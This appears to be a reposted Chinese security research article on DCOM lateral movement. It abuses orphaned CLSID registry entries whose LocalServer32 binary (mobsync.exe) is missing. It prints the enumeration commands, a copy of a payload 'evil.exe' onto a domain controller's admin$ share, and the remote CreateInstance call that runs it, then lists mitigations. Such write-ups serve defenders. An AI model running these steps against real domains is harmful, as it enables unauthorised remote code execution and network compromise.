使用DCOM怎么實(shí)現(xiàn)橫向滲透

使用DCOM怎么實(shí)現(xiàn)橫向滲透，很多新手對此不是很清楚，為了幫助大家解決這個(gè)難題，下面小編將為大家詳細(xì)講解，有這方面需求的人可以來學(xué)習(xí)下，希望你能有所收獲。

引言

在此之前，關(guān)于DCOM橫向滲透技術(shù)的內(nèi)容討論了已經(jīng)有一年半載了，Matt Nelson (enigma0x3)此前也介紹過多種利用D/COM對象（例如MMC20、ShellWindows,ShellBrowserWindow、Excel和Outlook）實(shí)現(xiàn)的橫向滲透技術(shù)。相應(yīng)的，Philip Tsukerman (@PhilipTsukerman)也發(fā)現(xiàn)過一種有趣的WMI橫向滲透技術(shù)，他的【    這篇文章】可以幫助大家更好地了解DCOM功能、橫向滲透技術(shù)以及相應(yīng)的緩解方案。在繼續(xù)閱讀本文之前，我強(qiáng)烈建議大家閱讀一下這些資料。

研究動(dòng)機(jī)

幾周之前，我打算對我的筆記本系統(tǒng)進(jìn)行虛擬化分析，雖然轉(zhuǎn)換過程非常痛苦，但最終還是在相關(guān)工具的幫助下成功了。但是考慮到安全問題，我需要確定原本的物理設(shè)備中是否還存有遺留數(shù)據(jù)，我手上沒有什么標(biāo)準(zhǔn)可以遵循，而且我對數(shù)字取證方面有額不感興趣。所以我打算研究一下注冊表，然后我很快就找到了一個(gè)有趣的CLSID注冊表路徑，它引用了一份二進(jìn)制文件，而這個(gè)文件很可能是筆記本上為某個(gè)程序提供實(shí)用功能或者診斷功能的一個(gè)程序：

通過DIR命令查詢后，我們發(fā)現(xiàn)磁盤中并沒有C:\WINDOWS\system32\IntelCpHDCPSvc.exe：

我的腦海里瞬間出現(xiàn)了下面三個(gè)想法：

1.   IntelCpHDCPSvc.exe是什么鬼？

2.   軟件卸載工具并沒有完全刪除舊軟件遺留在注冊表里的東西。

3.   這似乎是一個(gè)DCOM應(yīng)用（使用Get-CimInstanceWin32_DCOMApplication查詢語句進(jìn)行驗(yàn)證）。

通過搜索引擎得知，IntelCpHDCPSvc.exe跟英特爾的內(nèi)容保護(hù)HDCP服務(wù)有關(guān)，但是最有意思的是，LocalServer32和InProcServer32這兩個(gè)注冊表鍵值指向的是本應(yīng)該存在的二進(jìn)制文件路徑，而這些不存在的文件很可能會(huì)帶來嚴(yán)重的安全風(fēng)險(xiǎn)。由于在真實(shí)的攻擊中我們很少能夠看到IntelCpHDCPSvc的身影，因此我想看看能否可以利用DCOM來做些什么。

DCOM橫向滲透方法論

定位二進(jìn)制文件

首先，我們需要在DCOM應(yīng)用中定位相應(yīng)的二進(jìn)制文件路徑。這里我們可以利用下面的命令從Windows 2012中導(dǎo)出LocalServer32可執(zhí)行程序和InProcServer32 DLL：

gwmiWin32_COMSetting -computername 127.0.0.1 | ft LocalServer32 -autosize |Out-String -width 4096 | out-file dcom_exes.txt

gwmiWin32_COMSetting -computername 127.0.0.1 | ft InProcServer32 -autosize |Out-String -width 4096 | out-file dcom_dlls.txt

我們得到了下列信息：

對數(shù)據(jù)進(jìn)行拼接和過濾之后，我們可以使用下列命令查詢這些文件：

$file= gc C:\Users\test\desktop\dcom_things.txt

foreach($binpath in $file) {

 $binpath

 cmd.exe /c dir $binpath > $null

}

查詢結(jié)果如下：

%SystemRoot%\system32\mobsync.exe

FileNot Found

如下圖所示，文件確實(shí)不存在：

實(shí)際上，mobsync是Microsoft同步中心和脫機(jī)文件功能中的一個(gè)進(jìn)程，因此mobsync.exe又開始變得更加有趣了。

驗(yàn)證AppID和CLSID

之前我在枚舉AppID和CLSID方面沒有做得很好，所以我重新查看了注冊表并查找這些信息：

具體說來，在下個(gè)階段中我們需要利用[C947D50F-378E-4FF6-8835-FCB50305244D]這個(gè)CLSID來創(chuàng)建DCOM對象實(shí)例。

遠(yuǎn)程Payload執(zhí)行和橫向滲透

首先我們需要滿足以下條件：

1.   在遠(yuǎn)程實(shí)例化DCOM對象之前，我們需要拿到管理員權(quán)限。

2.   為了發(fā)揮Payload的作用，我們將嘗試滲透目標(biāo)主機(jī)所在域環(huán)境。假設(shè)已經(jīng)拿到了管理員賬號(hào)憑證，我們將以Windows 10作為攻擊端，然后在Windows 2012域控制器（DC）上嘗試實(shí)現(xiàn)遠(yuǎn)程命令執(zhí)行。

首先是Payload，并確保目標(biāo)系統(tǒng)中不包含mobsync.exe：

dir C:\evil.exe
dir \\acmedc\admin$\system32\mobsync.exe

非常好！由于mobsync.exe不存在，所以我們的Payload（evil.exe）就能夠繞過主機(jī)保護(hù)機(jī)制了，然后將其拷貝到DC上：

copy C:\evil.exe \\acmedc\admin$\system32\mobsync.exe
dir \\acmedc\admin$\system32\mobsync.exe

由于我們的二進(jìn)制文件無法識(shí)別DCOM，因此實(shí)例化操作將無法成功，但Payload還是可以成功觸發(fā)的：

[activator]::CreateInstance([type]::GetTypeFromCLSID("C947D50F-378E-4FF6-8835-FCB50305244D","target"))

Windows10域成員：

Windows2012域控制器：

非常好，我們的“mobsync.exe”生成了惡意的“notepad.exe” Payload。

緩解方案

廠商：

1.   當(dāng)軟件工具被卸載之后，確保沒有DCOM注冊表項(xiàng)遺留。

2.   不要在注冊表中創(chuàng)建指向并不存在的二進(jìn)制文件的DCOM程序路徑。

網(wǎng)絡(luò)防御端：

1.   認(rèn)真閱讀enigma0x3以及@PhilipTsukerman在各自文章中給出的建議，有針對性地收集相關(guān)IoC。

2.   避免重復(fù)使用主機(jī)賬號(hào)憑證。

3.   部署深度防御策略以及安全監(jiān)控產(chǎn)品。

4.   監(jiān)控文件系統(tǒng)及注冊表。

5.   監(jiān)控網(wǎng)絡(luò)環(huán)境中的異常PowerShell操作，盡量強(qiáng)制啟用PowerShell的受限語言模式（CLM）。

6.   當(dāng)DCOM調(diào)用失敗時(shí)，主機(jī)的系統(tǒng)日志中會(huì)生成ID為10010的錯(cuò)誤事件信息，其中將包含CLSID信息。

看完上述內(nèi)容是否對您有幫助呢？如果還想對相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章，請關(guān)注億速云行業(yè)資訊頻道，感謝您對億速云的支持。